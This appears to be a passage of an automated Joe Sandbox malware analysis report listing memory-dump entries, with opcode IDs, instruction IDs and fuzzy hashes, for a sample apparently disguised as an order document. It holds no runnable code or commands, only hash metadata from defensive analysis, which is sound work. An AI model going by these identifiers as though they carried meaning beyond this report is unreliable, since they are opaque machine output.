                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction ID: 7caa9fab62ad76711b1a7158866fb0912d9c7a4fc7f9e1328bc0f77ba71bcd30
                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction Fuzzy Hash: 20817271A002099FDF1DCF58C890AAEBBBAFF94314F148569D916EB344DB34DA41CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                      • Instruction ID: e750f47676a95600baeaed61586530467d99b782dd1c8b3d353334da1644e686
                                                      • Opcode Fuzzy Hash: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                      • Instruction Fuzzy Hash: 88815E71A00609AFDB26CFA9C880BEEFBFAFF48354F144429E555A7254DB30AD45CB60
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                      • Instruction ID: bfdae8a0097f9861468c04aec80cdeab4291f5f3482a71af1dbae588dd05ac52
                                                      • Opcode Fuzzy Hash: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                      • Instruction Fuzzy Hash: E171DF75D00629DBCB268F59C9907FEFBB1FF59710F14815AE942AB390E3709940CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 771d66dccc39a7e0cc7f438eac28abd3b40eaf742dec5867719cd12375294657
                                                      • Instruction ID: 8d2e4e4e7824de0506e026cde8b28b5c9a41a6da97b09829c2ebedd44db4c3c5
                                                      • Opcode Fuzzy Hash: 771d66dccc39a7e0cc7f438eac28abd3b40eaf742dec5867719cd12375294657
                                                      • Instruction Fuzzy Hash: 5871A270901205EFDBA1CF69D944A9ABBF9FF84301F28415AEA14E7259F7368B80CF54
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                      • Instruction ID: b3d9a60e0b40aefba73f1820b0edefba13bd74f35cc3071e497d5433c0b58167
                                                      • Opcode Fuzzy Hash: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                      • Instruction Fuzzy Hash: F371F1316052428FD312DF2CC484BAAF7E5FF84314F0485AAE898CB756EB34E946CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction ID: dd0c7f760964975dec0fce6b4bd7cba7810a90c28419d1cb07b91227af8ffef9
                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction Fuzzy Hash: 22715E71A00619EFDB11DFA9C984EEEBBB9FF48704F104569E505E7290DB34EA81CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                      • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                      • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                      • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                      • Instruction ID: 22b55775cde257da6f576b8b14a9eac4bb85cb5675a94695855dde7c1bb2a4be
                                                      • Opcode Fuzzy Hash: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                      • Instruction Fuzzy Hash: 4C81B472A0431A8FDB25CF9CD988B6DF7B2BB88315F59422DD900AB295C7749E41CF90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                      • Instruction ID: 4f16ea754ab112880a6252b4fd1f3957aabe4082dbad0cc9c0fd0de2bf310e7d
                                                      • Opcode Fuzzy Hash: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                      • Instruction Fuzzy Hash: 4151B172504612AFD755DEA8C8C8E5BBBE8EFC8754F010A29BE40DB150D770EE05C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                      • Instruction ID: c7f2bb6004c0fa61e24827a0cbb34e8ab9be143c1776677e6f4eb98df38a10a5
                                                      • Opcode Fuzzy Hash: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                      • Instruction Fuzzy Hash: 4051E27090070DDFD721DF9AC884A6BFBF8BF55714F10461ED292976A1CBB0A645CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                      • Instruction ID: 4bb9fb800ad0ef84b05d5c21ed16c16b618a639b9b44c417d2f299d3d22c94f3
                                                      • Opcode Fuzzy Hash: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                      • Instruction Fuzzy Hash: 07516B71600A09DFCB22EFA9C984EAAF3FDFB14784F400869E55297264DB34E940CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                      • Instruction ID: 76aa8ba87efe7531d5cc89f928e4a294508dbeb3301e419670cca9d5e68085d6
                                                      • Opcode Fuzzy Hash: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                      • Instruction Fuzzy Hash: 5E517A7160834A9FD754DF29C881A6BBBE5BFC8708F44492DF599C7250EB30DA05CB52
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: fe139c4e59eaa5f2d8ca23fd7855df1a8d449c637979eda8831b5fc7242be587
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: C1519E75E0020AABDF16DF98C854BEEFBB5AF44B50F04406DEA12AB240D734DA44CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction ID: cdfe20228c017acb2551508324bb287b8f5d829c93d57fbcba95900efedb2eab
                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction Fuzzy Hash: 6A51D931D0022EEFDF22DB94C894BAEBBB8AF04314F154655D612F7190D7709F808BA5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                      • Instruction ID: ca50577f0b1e7ac633de54c38ebf3f43ec25d237ce48f8204c11b8177bccc015
                                                      • Opcode Fuzzy Hash: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                      • Instruction Fuzzy Hash: 1F41E3B07017019BD729DB2DC894B7BBB9EEF92320F188219E95DCB284DB30DA01C791
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                      • Instruction ID: 6b6d29995038a7cb29f34cfc2778c516614fcd3e171e15f31d4af96b10bb0a71
                                                      • Opcode Fuzzy Hash: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                      • Instruction Fuzzy Hash: DE518F7190022ADFCB22DFA9C984AAEBBB9FF48354B644519D545E7305E730AE81CFD0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                      • Instruction ID: 519b3bc8ef7cb41f8522ee9945da4167bba61f5ea48491570d4b714792967c60
                                                      • Opcode Fuzzy Hash: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                      • Instruction Fuzzy Hash: 28412B72B002069BCB25EFA898C5F7AB774FB58718F5504ACED16DB249E7B1DA00CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction ID: c7f9569d8638651d9db483a5d2dcc9948999d35e4988f4a433d3a52826d7774f
                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction Fuzzy Hash: DD41E5316017169FD729CF28C984A6EB7ADFF80315B05466EE912DB644EB31EE04C7D0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                      • Instruction ID: 3d913a2a7b2eb1399d72481caedbb91731d86efdc2b804843a16ac212867df9d
                                                      • Opcode Fuzzy Hash: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                      • Instruction Fuzzy Hash: 25419B76D012199BDB14DF98C440AEEFBB4BF48710F14926EF915E7240DB35AD41CBA4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                      • Instruction ID: 50bc324ccacbb44569295e87da78ba602d169cadb4b8f689506b1e30240dca51
                                                      • Opcode Fuzzy Hash: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                      • Instruction Fuzzy Hash: 6141C0712003069FD721DF28C884A6BFBE9FF88324F14486DEA57C7656EB35E9448B50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: 6a0918a545b93b2b91861b06e5649af6fc9f3de040e2ddff4f116945d82fd594
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: E9516C76A01255CFCB19CF98C580AADF7BAFF84710F2481A9D915E7355D730AE81CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                      • Instruction ID: 8d26c4c6182ed33e8867b7a5f622ad4ff196471e093bf7ab24cf892793a15abb
                                                      • Opcode Fuzzy Hash: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                      • Instruction Fuzzy Hash: 7451187090420ADBDB269B28CC48BE8FBB1EF55314F1843A5E515E72D5E7346A81CF40
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                      • Instruction ID: 2b9b2def0494248292c0768a20a53133328eaf43963ee9d1fcc4d0bf0cac641b
                                                      • Opcode Fuzzy Hash: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                      • Instruction Fuzzy Hash: 0D419531A002299FDB31DF68C944BEAF7B4EF45740F4105A9EA08AB395DB749E80CF91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: 12f32ef8132d3c450727c3a69d2b3e366a85322d3bb34ca1b0b529aec9992ba0
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: F0417275B10309ABEB15DF99CC94AAFBBBEAF89710F144069E908E7341DA74DF018760
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                      • Instruction ID: 197f4375a2c1390a24900049efb03bbb17eed8ea1861d10ceae83fde0f43d688
                                                      • Opcode Fuzzy Hash: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                      • Instruction Fuzzy Hash: 3641BFB16007029FE325CF28C484A26FBF9FF88314B544A6DF54686A51E730F855CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                      • Instruction ID: 553922feab5e35d9449d2c9ec04991d7b321c7b74d6e85cc3913e4f93917dfa3
                                                      • Opcode Fuzzy Hash: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                      • Instruction Fuzzy Hash: EA41C132940609CFDB21CF68E9887EEFBB0BB18716F18459DD411B7285EB349A41CF50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                      • Instruction ID: 52d846590ed7a167d245a2fe7245f2177cee34381c5b6116fece8f4cab8b37bd
                                                      • Opcode Fuzzy Hash: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                      • Instruction Fuzzy Hash: AD414532900206CFD725DF48C988B6AFBB2FBD8700F59826ED5019B259C374DA42CF91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                      • Instruction ID: 768579a09b27f443fa7f0a90a15771ec5643daa44cd94286f85839d0678317e5
                                                      • Opcode Fuzzy Hash: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                      • Instruction Fuzzy Hash: E3416F325083069ED712DF65D840A6BF7E9EF89B54F40092EFA94D7250E731DE488BA3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction ID: 78924b9e5583634430ad6c06fc42730a1370dcc7314dbba69fe91ce739b78538
                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction Fuzzy Hash: 2D412431A05212DBDF25DE2CD484BBBFBB1EB90754F1580AEAA458B344E7328D84CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cf68133a9025dcb1788fa6969fc5dfec33c88fb7a29a26abca165b0c76b2006
                                                      • Instruction ID: d9b202ec233fe8324d5240fdb686841d1b1b9457854e698e1772b6aa8aaccbdb
                                                      • Opcode Fuzzy Hash: 1cf68133a9025dcb1788fa6969fc5dfec33c88fb7a29a26abca165b0c76b2006
                                                      • Instruction Fuzzy Hash: 61415772601601EFD721CF18C884B66FBE4FF98314F648A6AF5498B251E771EA42CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction ID: fdaba4b0ef3c2a31809c702bbb1134f3321a418fafaad3c3a0d6abfc19f7ab67
                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction Fuzzy Hash: 97318931600605EFEB21CFA8D884F6AB7F9EF45354F1445A9E652CB290EB30EE45CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                      • Instruction ID: 0633480eed3b87be57a8ef2646822a9e7b6172851f0a8fb7400e27ee3dac900a
                                                      • Opcode Fuzzy Hash: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                      • Instruction Fuzzy Hash: E6316B76A00205DFCB19CF18C884DAEB7B9EF84304F554859EC09DB399E731AA40CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                      • Instruction ID: 9812914dc1aa567e762058e0e5ec0c629f9c066732bc0f692d941973b99d47cd
                                                      • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                      • Instruction Fuzzy Hash: A5214832601A499BE7279B2CCC8CB65B7B6AF84754F0A05A0ED02C76D2E3B4DE80C251
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                      • Instruction ID: 4bcea0d2e0ba3e1b5dadd6ff4287a8ecb4a35dd63ce594c271a5263dc70a3478
                                                      • Opcode Fuzzy Hash: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                      • Instruction Fuzzy Hash: F1217C71900229AFCF21DF59C881ABEB7F4FF48740B544069F941EB254D739AE42CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                      • Instruction ID: 5984efb8ce823a05a072f01376a4ba4551097698713b0813607efc50080ede6c
                                                      • Opcode Fuzzy Hash: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
